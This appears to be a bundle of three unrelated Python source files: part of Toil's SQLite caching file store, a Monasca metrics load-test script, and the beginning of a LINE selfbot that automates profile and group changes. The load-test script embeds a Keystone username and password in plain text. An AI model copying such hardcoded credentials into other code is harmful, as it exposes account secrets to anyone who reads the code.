if mutable:
return self._readGlobalFileMutablyWithCache(fileStoreID, localFilePath, readerID)
else:
return self._readGlobalFileWithCache(fileStoreID, localFilePath, symlink, readerID)
else:
# We do not want to use the cache
return self._readGlobalFileWithoutCache(fileStoreID, localFilePath, mutable, symlink, readerID)
def _readGlobalFileWithoutCache(self, fileStoreID, localFilePath, mutable, symlink, readerID):
"""
Read a file without putting it into the cache.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool mutable: Whether a mutable copy should be created, instead of a hard link or symlink.
:param bool symlink: Whether a symlink is acceptable.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# We would like to read directly from the backing job store, since
# we don't want to cache the result. However, we may be trying to
# read a file that is 'uploadable' or 'uploading' and hasn't hit
# the backing job store yet.
# Try and make a 'copying' reference to such a file
self._write([('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ?)',
(localFilePath, readerID, 'copying', fileStoreID, 'uploadable', 'uploading'))])
# See if we got it
have_reference = False
for row in self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID)):
have_reference = row[0] > 0
if have_reference:
# If we succeed, copy the file. We know the job has space for it
# because if we didn't do this we'd be getting a fresh copy from
# the job store.
# Find where the file is cached
cachedPath = None
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
if cachedPath is None:
raise RuntimeError('File %s went away while we had a reference to it!' % fileStoreID)
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
atomic_copy(cachedPath, localFilePath)
# Change the reference to mutable
self._write([('UPDATE refs SET state = ? WHERE path = ? and file_id = ?', ('mutable', localFilePath, fileStoreID))])
else:
# If we fail, the file isn't cached here in 'uploadable' or
# 'uploading' state, so that means it must actually be in the
# backing job store, so we can get it from the backing job store.
# Create a 'mutable' reference (even if we end up with a link)
# so we can see this file in deleteLocalFile.
self._write([('INSERT INTO refs VALUES (?, ?, ?, ?)',
(localFilePath, fileStoreID, readerID, 'mutable'))])
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
# Just read directly
if mutable or self.forceNonFreeCaching:
# Always copy
with self.jobStore.readFileStream(fileStoreID) as inStream:
atomic_copyobj(inStream, localFilePath)
else:
# Link or maybe copy
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
# Now we got the file, somehow.
return localFilePath
def _downloadToCache(self, fileStoreID, cachedPath):
"""
Copy a file from the file store into the cache.
Will hardlink if appropriate.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str cachedPath: absolute destination path in the cache. Already known not to exist.
"""
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
if self.forceNonFreeCaching:
# Always copy
with self.jobStore.readFileStream(fileStoreID) as inStream:
atomic_copyobj(inStream, cachedPath)
else:
# Link or maybe copy
self.jobStore.readFile(fileStoreID, cachedPath, symlink=False)
def _readGlobalFileMutablyWithCache(self, fileStoreID, localFilePath, readerID):
"""
Read a mutable copy of a file, putting it into the cache if possible.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# Work out who we are
me = get_process_name(self.workDir)
# Work out where to cache the file if it isn't cached already
cachedPath = self._getNewCachingPath(fileStoreID)
# Start a loop until we can do one of these
while True:
# Try and create a downloading entry if no entry exists
logger.debug('Trying to make file record for id %s', fileStoreID)
self._write([('INSERT OR IGNORE INTO files VALUES (?, ?, ?, ?, ?)',
(fileStoreID, cachedPath, self.getGlobalFileSize(fileStoreID), 'downloading', me))])
# See if we won the race
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?', (fileStoreID, 'downloading', me))
if self.cur.fetchone()[0] > 0:
# We are responsible for downloading the file
logger.debug('We are now responsible for downloading file %s', fileStoreID)
# Make sure we have space for this download.
self._freeUpSpace()
# Do the download into the cache.
self._downloadToCache(fileStoreID, cachedPath)
# Now, we may have to immediately give away this file, because
# we don't have space for two copies.
# If so, we can't let it go to cached state, because someone
# else might make a reference to it, and we may get stuck with
# two readers, one cached copy, and space for two copies total.
# Make the copying reference
self._write([('INSERT INTO refs VALUES (?, ?, ?, ?)',
(localFilePath, fileStoreID, readerID, 'copying'))])
# Fulfill it with a full copy or by giving away the cached copy
self._fulfillCopyingReference(fileStoreID, cachedPath, localFilePath)
# Now we're done
return localFilePath
else:
logger.debug('Someone else is already responsible for file %s', fileStoreID)
# A record already existed for this file.
# Try and create an immutable or copying reference to an entry that
# is in 'cached' or 'uploadable' or 'uploading' state.
# It might be uploading because *we* are supposed to be uploading it.
logger.debug('Trying to make reference to file %s', fileStoreID)
self._write([('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(localFilePath, readerID, 'copying', fileStoreID, 'cached', 'uploadable', 'uploading'))])
# See if we got it
self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID))
if self.cur.fetchone()[0] > 0:
# The file is cached and we can copy or link it
logger.debug('Obtained reference to file %s', fileStoreID)
# Get the path it is actually at in the cache, instead of where we wanted to put it
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
while self.getCacheAvailable() < 0:
# Since we now have a copying reference, see if we have used too much space.
# If so, try to free up some space by deleting or uploading, but
# don't loop forever if we can't get enough.
self._tryToFreeUpSpace()
if self.getCacheAvailable() >= 0:
# We made room
break
# See if we have no other references and we can give away the file.
# Change it to downloading owned by us if we can grab it.
self._write([("""
UPDATE files SET files.owner = ?, files.state = ? WHERE files.id = ? AND files.state = ?
AND files.owner IS NULL AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
)
""",
(me, 'downloading', fileStoreID, 'cached'))])
if self._giveAwayDownloadingFile(fileStoreID, cachedPath, localFilePath):
# We got ownership of the file and managed to give it away.
return localFilePath
# If we don't have space, and we couldn't make space, and we
# couldn't get exclusive control of the file to give it away, we
# need to wait for one of those people with references to the file
# to finish and give it up.
# TODO: work out if that will never happen somehow.
time.sleep(self.contentionBackoff)
# OK, now we have space to make a copy.
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
# Make the copy
atomic_copy(cachedPath, localFilePath)
# Change the reference to mutable
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))])
# Now we're done
return localFilePath
else:
# We didn't get a reference. Maybe it is still downloading.
logger.debug('Could not obtain reference to file %s', fileStoreID)
# Loop around again and see if either we can download it or we can get a reference to it.
# If we didn't get a download or a reference, adopt and do work
# from dead workers and loop again.
# We may have to wait for someone else's download or delete to
# finish. If they die, we will notice.
self._removeDeadJobs(self.workDir, self.con)
self._stealWorkFromTheDead()
self._executePendingDeletions(self.workDir, self.con, self.cur)
# Wait for other people's downloads to progress before re-polling.
time.sleep(self.contentionBackoff)
def _fulfillCopyingReference(self, fileStoreID, cachedPath, localFilePath):
"""
For use when you own a file in 'downloading' state, and have a
'copying' reference to it.
Makes a full copy from the cache, and changes 'downloading' file state
to 'cached', if space can be found, or gives away the cached copy if
space cannot be found.
:param toil.fileStores.FileID or str fileStoreID: job store id for the file
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
"""
if self.getCacheAvailable() < 0:
self._tryToFreeUpSpace()
if self.getCacheAvailable() < 0:
# No space for the cached copy and this copy. Give this copy away.
assert self._giveAwayDownloadingFile(fileStoreID, cachedPath, localFilePath)
return
# Otherwise we have space for the cached copy and the user copy.
# Expose this file as cached so other people can copy off of it too.
# Change state from downloading to cached
self._write([('UPDATE files SET state = ?, owner = NULL WHERE id = ?',
('cached', fileStoreID))])
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
# Make our copy
atomic_copy(cachedPath, localFilePath)
# Change our reference to mutable
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))])
# Now we're done
return
def _giveAwayDownloadingFile(self, fileStoreID, cachedPath, localFilePath):
"""
Move a downloaded file in 'downloading' state, owned by us, from the cache to a user-specified destination path.
Used when there's no room for both a cached copy of the file and the user's actual mutable copy.
Returns true if the file was moved, and false if the file was not owned by us in 'downloading' state.
:param toil.fileStores.FileID or str fileStoreID: job store id for the file
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
:return: True if the file is successfully moved. False if the file is not owned by us in 'downloading' state.
:rtype: bool
"""
# Work out who we are
me = get_process_name(self.workDir)
# See if we actually own this file and can giove it away
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?',
(fileStoreID, 'downloading', me))
if self.cur.fetchone()[0] > 0:
# Now we have exclusive control of the cached copy of the file, so we can give it away.
# Don't fake a delay here; this should be a rename always.
# We are giving it away
shutil.move(cachedPath, localFilePath)
# Record that.
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID)),
('DELETE FROM files WHERE id = ?', (fileStoreID,))])
# Now we're done
return True
else:
# We don't own this file in 'downloading' state
return False
def _createLinkFromCache(self, cachedPath, localFilePath, symlink=True):
"""
Create a hardlink or symlink from the given path in the cache to the
given user-provided path. Destination must not exist.
Only creates a symlink if a hardlink cannot be created and symlink is
true.
If no link can be created, returns False. Otherwise, returns True.
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool symlink: True if a symlink is allowed, False otherwise.
:return: True if the file is successfully linked. False if the file cannot be linked.
:rtype: bool
"""
try:
# Try and make the hard link.
os.link(cachedPath, localFilePath)
return True
except OSError:
if symlink:
# Or symlink
try:
os.symlink(cachedPath, localFilePath)
return True
except OSError:
return False
else:
return False
def _readGlobalFileWithCache(self, fileStoreID, localFilePath, symlink, readerID):
"""
Read a file, putting it into the cache if possible.
:param toil.fileStores.FileID or str fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool symlink: Whether a symlink is acceptable.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# Now we know to use the cache, and that we don't require a mutable copy.
# Work out who we are
me = get_process_name(self.workDir)
# Work out where to cache the file if it isn't cached already
cachedPath = self._getNewCachingPath(fileStoreID)
# Start a loop until we can do one of these
while True:
# Try and create a downloading entry if no entry exists.
# Make sure to create a reference at the same time if it succeeds, to bill it against our job's space.
# Don't create the mutable reference yet because we might not necessarily be able to clear that space.
logger.debug('Trying to make file record and reference for id %s', fileStoreID)
self._write([('INSERT OR IGNORE INTO files VALUES (?, ?, ?, ?, ?)',
(fileStoreID, cachedPath, self.getGlobalFileSize(fileStoreID), 'downloading', me)),
('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND state = ? AND owner = ?',
(localFilePath, readerID, 'immutable', fileStoreID, 'downloading', me))])
# See if we won the race
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?', (fileStoreID, 'downloading', me))
if self.cur.fetchone()[0] > 0:
# We are responsible for downloading the file (and we have the reference)
logger.debug('We are now responsible for downloading file %s', fileStoreID)
# Make sure we have space for this download.
self._freeUpSpace()
# Do the download into the cache.
self._downloadToCache(fileStoreID, cachedPath)
# Try and make the link before we let the file go to cached state.
# If we fail we may end up having to give away the file we just downloaded.
if self._createLinkFromCache(cachedPath, localFilePath, symlink):
# We made the link!
# Change file state from downloading to cached so other people can use it
self._write([('UPDATE files SET state = ?, owner = NULL WHERE id = ?',
('cached', fileStoreID))])
# Now we're done!
return localFilePath
else:
# We could not make a link. We need to make a copy.
# Change the reference to copying.
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('copying', localFilePath, fileStoreID))])
# Fulfill it with a full copy or by giving away the cached copy
self._fulfillCopyingReference(fileStoreID, cachedPath, localFilePath)
# Now we're done
return localFilePath
else:
logger.debug('Someone else is already responsible for file %s', fileStoreID)
# A record already existed for this file.
# Try and create an immutable reference to an entry that
# is in 'cached' or 'uploadable' or 'uploading' state.
# It might be uploading because *we* are supposed to be uploading it.
logger.debug('Trying to make reference to file %s', fileStoreID)
self._write([('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(localFilePath, readerID, 'immutable', fileStoreID, 'cached', 'uploadable', 'uploading'))])
# See if we got it
self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID))
if self.cur.fetchone()[0] > 0:
# The file is cached and we can copy or link it
logger.debug('Obtained reference to file %s', fileStoreID)
# Get the path it is actually at in the cache, instead of where we wanted to put it
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
if self._createLinkFromCache(cachedPath, localFilePath, symlink):
# We managed to make the link
return localFilePath
else:
# We can't make the link. We need a copy instead.
# We could change the reference to copying, see if
# there's space, make the copy, try and get ahold of
# the file if there isn't space, and give it away, but
# we already have code for that for mutable downloads,
# so just clear the reference and download mutably.
self._write([('DELETE FROM refs WHERE path = ? AND file_id = ?', (localFilePath, fileStoreID))])
return self._readGlobalFileMutablyWithCache(fileStoreID, localFilePath, readerID)
else:
logger.debug('Could not obtain reference to file %s', fileStoreID)
# If we didn't get a download or a reference, adopt and do work from dead workers and loop again.
# We may have to wait for someone else's download or delete to
# finish. If they die, we will notice.
self._removeDeadJobs(self.workDir, self.con)
self._stealWorkFromTheDead()
self._executePendingDeletions(self.workDir, self.con, self.cur)
# Wait for other people's downloads to progress.
time.sleep(self.contentionBackoff)
def readGlobalFileStream(self, fileStoreID):
if str(fileStoreID) in self.filesToDelete:
# File has already been deleted
raise FileNotFoundError('Attempted to read deleted file: {}'.format(fileStoreID))
# TODO: can we fulfil this from the cache if the file is in the cache?
# I think we can because if a job is keeping the file data on disk due to having it open, it must be paying for it itself.
return self.jobStore.readFileStream(fileStoreID)
def deleteLocalFile(self, fileStoreID):
# What job are we operating as?
jobID = self.jobID
# What paths did we delete
deleted = []
# What's the first path, if any, that was missing? If we encounter a
# missing ref file, we will raise an error about it and stop deleting
# things.
missingFile = None
for row in self.cur.execute('SELECT path FROM refs WHERE file_id = ? AND job_id = ?', (fileStoreID, jobID)):
# Delete all the files that are references to this cached file (even mutable copies)
path = row[0]
if path.startswith(self.localTempDir):
# It is actually in the local temp dir where we are supposed to be deleting things
try:
os.remove(path)
except FileNotFoundError as err:
if err.errno != errno.ENOENT:
# Something else went wrong
raise
# Otherwise, file is missing, but that's fine.
missingFile = path
break
deleted.append(path)
for path in deleted:
# Drop the references
self._write([('DELETE FROM refs WHERE file_id = ? AND job_id = ? AND path = ?', (fileStoreID, jobID, path))])
# Now space has been revoked from the cache because that job needs its space back.
# That might result in stuff having to be evicted.
self._freeUpSpace()
if missingFile is not None:
# Now throw an error about the file we couldn't find to delete, if
# any. TODO: Only users who know to call deleteLocalFile will ever
# see this. We also should check at the end of the job to make
# sure all the refs are intact.
raise IllegalDeletionCacheError(missingFile)
def deleteGlobalFile(self, fileStoreID):
# Delete local copies for this job
self.deleteLocalFile(fileStoreID)
# Work out who we are
me = get_process_name(self.workDir)
# Make sure nobody else has references to it
for row in self.cur.execute('SELECT job_id FROM refs WHERE file_id = ? AND state != ?', (fileStoreID, 'mutable')):
raise RuntimeError('Deleted file ID %s which is still in use by job %s' % (fileStoreID, row[0]))
# TODO: should we just let other jobs and the cache keep the file until
# it gets evicted, and only delete at the back end?
# Pop the file into deleting state owned by us if it exists
self._write([('UPDATE files SET state = ?, owner = ? WHERE id = ?', ('deleting', me, fileStoreID))])
# Finish the delete if the file is present
self._executePendingDeletions(self.workDir, self.con, self.cur)
# Add the file to the list of files to be deleted from the job store
# once the run method completes.
self.filesToDelete.add(str(fileStoreID))
self.logToMaster('Added file with ID \'%s\' to the list of files to be' % fileStoreID +
' globally deleted.', level=logging.DEBUG)
def exportFile(self, jobStoreFileID, dstUrl):
# First we need to make sure the file is actually in the job store if
# we have it cached and need to upload it.
# We don't have to worry about the case where a different process is
# uploading it because we aren't supposed to have the ID from them
# until they are done.
# For safety and simplicity, we just execute all pending uploads now.
self._executePendingUploads(self.con, self.cur)
# Then we let the job store export. TODO: let the export come from the
# cache? How would we write the URL?
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def waitForCommit(self):
# We need to block on the upload thread.
# We may be called even if startCommit is not called. In that
# case, a new instance of this class should have been created by the
# worker and ought to pick up all our work by PID via the database, and
# this instance doesn't actually have to commit.
if self.commitThread is not None:
self.commitThread.join()
return True
def startCommit(self, jobState=False):
# If we already started a commit (maybe with a different parameter
# value?) wait on it, so we can't forget to join it later.
self.waitForCommit()
# Start the commit thread
self.commitThread = threading.Thread(target=self.startCommitThread, args=(jobState,))
self.commitThread.start()
def startCommitThread(self, jobState):
"""
Run in a thread to actually commit the current job.
"""
# Make sure the previous job is committed, if any
if self.waitForPreviousCommit is not None:
self.waitForPreviousCommit()
try:
# Reconnect to the database from this thread. The main thread can
# keep using self.con and self.cur. We need to do this because
# SQLite objects are tied to a thread.
con = sqlite3.connect(self.dbPath, timeout=SQLITE_TIMEOUT_SECS)
cur = con.cursor()
logger.debug('Committing file uploads asynchronously')
# Finish all uploads
self._executePendingUploads(con, cur)
# Finish all deletions out of the cache (not from the job store)
self._executePendingDeletions(self.workDir, con, cur)
if jobState:
# Do all the things that make this job not redoable
logger.debug('Committing file deletes and job state changes asynchronously')
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The workflow diorectory for the node, which is used as the
cache directory, containing cache state database. Job
local temp directories will be removed due to their
appearance in the database.
"""
if os.path.isdir(dir_):
# There is a directory to clean up
# We need the database for the most recent workflow attempt so we
# can clean up job temp directories.
# We don't have access to a class instance, nor do we have access
# to the workflow attempt number that we would need in order to
# find the right database by just going to it. We can't have a link
# to the current database because opening SQLite databases under
# multiple names breaks SQLite's atomicity guarantees (because you
# can't find the journal).
# So we just go and find the cache-n.db with the largest n value,
# and use that.
dbFilename = None
dbAttempt = float('-inf')
for dbCandidate in os.listdir(dir_):
# For each thing in the directory
match = re.match('cache-([0-9]+).db', dbCandidate)
if match and int(match.group(1)) > dbAttempt:
# If it looks like a caching database and it has a higher
# number than any other one we have seen, use it.
dbFilename = dbCandidate
dbAttempt = int(match.group(1))
if dbFilename is not None:
# We found a caching database
logger.debug('Connecting to latest caching database %s for cleanup', dbFilename)
dbPath = os.path.join(dir_, dbFilename)
if os.path.exists(dbPath):
try:
# The database exists, see if we can open it
con = sqlite3.connect(dbPath, timeout=SQLITE_TIMEOUT_SECS)
except:
# Probably someone deleted it.
pass
else:
# We got a database connection
# Create the tables if they don't exist so deletion of dead
# jobs won't fail.
cls._ensureTables(con)
# Remove dead jobs and their job directories (not under the
# cache)
cls._removeDeadJobs(dir_, con)
con.close()
else:
logger.debug('No caching database found in %s', dir_)
# Whether or not we found a database, we need to clean up the cache
# directory. Delete the state DB if any and everything cached.
robust_rmtree(dir_)
def __del__(self):
"""
Cleanup function that is run when destroying the class instance that ensures that all the
file writing threads exit.
"""
self.waitForCommit()
@classmethod
def _removeDeadJobs(cls, workDir, con):
"""
Look at the state of all jobs registered in the database, and handle them
(clean up the disk)
:param str workDir: Toil work directory.
:param sqlite3.Connection con: Connection to the cache database.
"""
# Get a cursor
cur = con.cursor()
# Work out our process name for taking ownership of jobs
me = get_process_name(workDir)
# Get all the dead worker PIDs
workers = []
for row in cur.execute('SELECT DISTINCT worker FROM jobs WHERE worker IS NOT NULL'):
workers.append(row[0])
# Work out which of them are not currently running.
# TODO: account for PID reuse somehow.
deadWorkers = []
for worker in workers:
if not process_name_exists(workDir, worker):
deadWorkers.append(worker)
# Now we know which workers are dead.
# Clear them off of the jobs they had.
for deadWorker in deadWorkers:
cls._staticWrite(con, cur, [('UPDATE jobs SET worker = NULL WHERE worker = ?', (deadWorker,))])
if len(deadWorkers) > 0:
logger.debug('Reaped %d dead workers', len(deadWorkers))
while True:
# Find an unowned job.
# Don't take all of them; other people could come along and want to help us with the other jobs.
cur.execute('SELECT id FROM jobs WHERE worker IS NULL LIMIT 1')
row = cur.fetchone()
if row is None:
# We cleaned up all the jobs
break
jobID = row[0]
# Try to own this job
cls._staticWrite(con, cur, [('UPDATE jobs SET worker = ? WHERE id = ? AND worker IS NULL', (me, jobID))])
# See if we won the race
cur.execute('SELECT id, tempdir FROM jobs WHERE id = ? AND worker = ?', (jobID, me))
row = cur.fetchone()
if row is None:
# We didn't win the race. Try another one.
continue
# If we did win, delete the job and its files and temp dir
cls._removeJob(con, cur, jobID)
logger.debug('Cleaned up orphanded job %s', jobID)
# Now we have cleaned up all the jobs that belonged to dead workers that were dead when we entered this function.
|
perf-cs.py
|
"""num_threads simulates the number of clients
num_requests is the number of http requests per thread
num_metrics_per_request is the number of metrics per http request
Headers has the http header. You might want to set X-Auth-Token.
Urls can be an array of the Monasca API urls. There is only one url in
it right now, but you could add like the 3.
12/2014 Joe changes
- modified to create seperate python processes for each thread
1/2015 Allan changes
- modified for QA performance baseline testing
- all metric posts create a new time series based on a unique name
- the default numbers simulate 10K agent nodes posting 100 metrics/agent node
- added token retrieval from keystone, happens once for entire run
- added timestamp to output
- moved keystone to node 01 from 09
- made metric body more realistic, added dimensions, simplified name
6/2015 Allan changes
- modified for the CloudSystems env
- made dimensions as close to real CS metrics as possible
- by default, simulating 55K unique metrics to cover max CS load
- prior to running script, replace keystone password with password from hosts file on CS Monasca control node(s)
"""
import httplib
import multiprocessing
import sys
import time
import urlparse
from datetime import datetime
import simplejson
import hashlib
from xml.etree.ElementTree import XML
num_processes = 1
#num_requests = 1
#num_metrics_per_request = 1
num_requests = 220 # i - number of agents
num_metrics_per_request = 250 # x - number of metrics per agent
print "total: %s" % (num_processes*num_requests*num_metrics_per_request)
print('Time Stamp %s' % str(datetime.now()))
headers = {"Content-type": "application/json", "Accept": "application/json"}
urls = [
'http://192.168.0.5:8080/v2.0/metrics'
]
keystone = 'http://192.168.0.20:5000/v3/auth/tokens'
def getToken():
keyurl = urlparse.urlparse(keystone)
keyconn = httplib.HTTPConnection(keyurl.netloc)
keybody = { "auth": {
"identity": {
"methods": ["password"],
"password": {
"user": {
"name": "monasca",
"domain": { "id": "default" },
"password": "538ac28040b1003fcaf259cb3c3fe51a2881a42b"
}
}
},
"scope": {
"project": {
"name": "demo",
"domain": { "id": "default" }
}
}
}
}
keybody = simplejson.dumps(keybody)
keyconn.request("POST", keyurl.path, keybody, headers)
res = keyconn.getresponse()
return res
def doWork(url_queue, num_requests,id):
url = url_queue.get()
for x in xrange(num_requests):
status, response = getStatus(url,id,x)
doSomethingWithResult(status, response)
def getStatus(ourl,id,x):
try:
url = urlparse.urlparse(ourl)
conn = httplib.HTTPConnection(url.netloc)
body = []
for i in xrange(num_metrics_per_request):
epoch = (int)(time.time()) - 120
body.append({"name": "cs.test_perf_" + str(x),
"dimensions": {"service": "monitoring", "hostname": "kvm" + str(i) + "-cn.veritas.local", "host_type": "compute_node", "role": "kvm", "device": "hw-" + str(i), "nova_id": str(i)},
"timestamp": epoch*1000,
"value": i})
body = simplejson.dumps(body)
conn.request("POST", url.path, body, tokenheaders)
res = conn.getresponse()
if res.status != 204:
raise Exception(res.status)
return res.status, ourl
except Exception as ex:
print ex
return "error", ourl
def doSomethingWithResult(status, url):
pass
q = multiprocessing.Queue()
for i in xrange(num_processes):
url = urls[i % len(urls)]
q.put(url.strip())
process_list = []
token = getToken().getheader('x-subject-token')
tokenheaders = {"Content-type": "application/json", "X-Auth-Token": token }
for i in range(num_processes):
p = multiprocessing.Process(target=doWork, args=(q, num_requests,i))
process_list.append(p)
p.start()
try:
for p in process_list:
try:
p.join()
except Exception:
pass
except KeyboardInterrupt:
sys.exit(1)
|
talk.py
|
# -*- coding: utf-8 -*-
from random import randint
from bs4 import BeautifulSoup
from wikiapi import WikiApi
from akad.ttypes import *
from kbbi import KBBI
from datetime import datetime, timedelta, date
from youtube_dl import YoutubeDL
from Aditya import Kaskus
from Aditya.AdityaMangakyo import *
import youtube_dl
from multiprocessing import Pool, Process
import time,random,sys,json,requests,os,subprocess,re,ast,traceback,humanize,threading,base64
from Aditya.AdityaSplitGood import AdityaSplitGood
from Aditya.memedit import *
import ntpath
def loggedIn(func):
def checkLogin(*args, **kwargs):
if args[0].isLogin:
return func(*args, **kwargs)
else:
args[0].callback.other('You want to call the function, you must login to LINE')
return checkLogin
class Talk(object):
isLogin = False
_messageReq = {}
_unsendMessageReq = 0
kuciyose = {}
def __init__(self):
self.isLogin = True
"""User"""
def changecpvv(self,to,wait):
try:
path_vid = wait['talkban']['video']
files = {'file': open(path_vid, 'rb')}
obs_params = self.genOBSParams({'oid': self.profile.mid, 'ver': '2.0', 'type': 'video', 'cat': 'vp.mp4'})
data = {'params': obs_params}
if wait['talkban']['pict'] == '':
return self.sendMessage(to, " 「 Profile 」\nType: Change Profile Video Picture\nStatus: Send the image....♪")
self.sendMessage(to, " 「 Profile 」\nType: Change Profile Video Picture\nStatus: Waiting....♪")
r_vp = self.server.postContent('{}/talk/vp/upload.nhn'.format(str(self.server.LINE_OBS_DOMAIN)), data=data, files=files)
if r_vp.status_code != 201:return "Failed"
path_pic = wait['talkban']['pict']
wait['talkban']['cvp'] = False
wait['talkban']['pict'] = ''
self.updateProfilePicture(path_pic, 'vp')
except Exception as e:
self.sendMessage(to, " 「 Profile 」\nType: Change Profile Video Picture\nStatus: ERROR 404 Plese Try again")
def fancyfancy(self,wait):
if wait['ChangeCover'] == True:
try:
if time.time() - wait['talkban']['time'] >= wait['talkban']['timer']:
a = random.randint(0,len(wait['timeline']))
self.updateProfileAttribute(2, wait['timeline'][a])
wait['talkban']['time'] = time.time()
wait['talkban']['timer'] = wait['talkban']['timer']
except:pass
def aditcontenttype(self,msg,wait,kuciyose):
if msg.contentType == 16:
if msg.to in wait["kitsuneshare"]:
zxc = " 「 POST NOTIFICATION 」\nCreate By: @!"
try:a = msg.contentMetadata["text"]
except:a = 'None'
zxc+= '\nText: '+a+'\nLink: '+msg.contentMetadata["postEndUrl"]
self.sendMention(msg.to,zxc,'',[msg.contentMetadata["postEndUrl"][25:58]])
if msg.contentType == 2:
if wait['talkban']['cvp'] == True:
try:
path = self.downloadObjectMsg(msg.id)
wait['talkban']['pict'] = ''
wait['talkban']['video'] = path
self.changecpvv(msg.to,wait)
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
if msg.contentType == 1:
if wait["ChangeDP"] == True:
try:
path = self.downloadFileURL('https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id, 'path')
self.updateProfilePicture(path)
self.sendMessage(msg.to, " 「 Profile 」\nType: Change Profile Picture\nStatus: Profile Picture Hasbeen change♪")
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
wait["ChangeDP"] = False
if wait['talkban']['cvp'] == True:
try:
path = self.downloadObjectMsg(msg.id)
wait['talkban']['pict'] = path
self.changecpvv(msg.to,wait)
self.sendMessage(msg.to, " 「 Profile 」\nType: Change Profile Video Picture\nStatus: Profile Video Picture Hasbeen change♪")
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
if wait["GN"] == True:
try:
self.downloadObjectMsg(msg_id,'path','dataSeen/'+msg.to+'.png')
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
wait["GN"] = False
if msg.to in wait["setTimess"]:
try:
path = self.downloadObjectMsg(msg.id,'path','dataSeen/adityab.png')
self.updateGroupPicture(msg.to,path)
self.sendMessage(msg.to, " 「 Group 」\nType: Change Cover Group\nStatus: Cover Group Hasbeen change♪")
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
wait["setTimess"].remove(msg.to)
if wait['ChangeGDP'] == True:
try:
a = self.downloadObjectMsg(msg.id,'path','s.png')
self.addImageToAlbum(msg.to, wait["Images"]['anu'], 's.png')
except Exception as e:
self.sendMessage(msg.to,"「 Auto Respond 」\n"+str(e))
wait["Img"] = {}
wait['ChangeGDP'] = False
if kuciyose['MakeWaterColor'] == True:
try:a = threading.Thread(target=self.imageGenerate, args=(msg,'http://ari-api.herokuapp.com/watercolor?type=2&rancol=on&url=',)).start();kuciyose['MakeWaterColor'] = False
except:self.sendMessage(msg.to,' 「 Water Color 」\nType: Image Generator\nStatus: Error Proses Image..♪\nImportant: Please Send the image again')
if kuciyose['DrawImage'] == True:
try:a = threading.Thread(target=self.imageGenerate, args=(msg,'http://ari-api.herokuapp.com/drawing?url=',)).start();kuciyose['DrawImage'] = False
